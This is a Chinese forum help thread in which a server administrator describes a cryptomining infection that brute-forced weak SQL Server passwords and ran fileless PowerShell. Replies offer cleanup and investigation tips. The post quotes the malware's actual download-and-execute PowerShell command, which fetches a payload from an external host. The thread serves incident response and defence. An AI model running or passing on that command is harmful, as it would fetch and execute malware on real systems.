【求助】挖矿病毒爆破SQLServer服务,利用powershell进行无文件攻击,求清理方法
服务器中了挖矿病毒,通过弱口令爆破SQLServer服务,注入powerShell进行无文件攻击命令行: cmd.exe /c powershell iex(new-object net.webclient).downloadstring('http://d.ackng.com/if.bin?once')
进程路径: C:/Windows/System32/cmd.exe
进程ID: 11320
父进程命令行: C:/Program Files/Microsoft SQL Server/MSSQL12.MSSQLSERVER/MSSQL/Binn/sqlservr.exe
父进程文件路径: C:/Program Files/Microsoft SQL Server/MSSQL12.MSSQLSERVER/MSSQL/Binn/sqlservr.exe
查阅网上信息后只能知道以上信息,SQLServer与windowns定时任务都查过了,没有发现异常任务。SQLServer密码已经修改,但该病毒仍然会自启。
求助如何清理该病毒? 用hunter或者火绒剑看一下有没有注入到正常进程的,还有查一下外部链接啥的,排查防火墙开没开什么出入站策略啥的 本帖最后由 szswtw 于 2020-9-25 08:12 编辑
请参照我的一个旧帖,看看有没有雷同。
https://www.52pojie.cn/thread-671337-1-1.html
另外此类病毒是可以通过局域网传播和攻击的,也需要全局域网内检查。封闭该封闭的端口和服务。 sql server的作业查了吗?
页:
[1]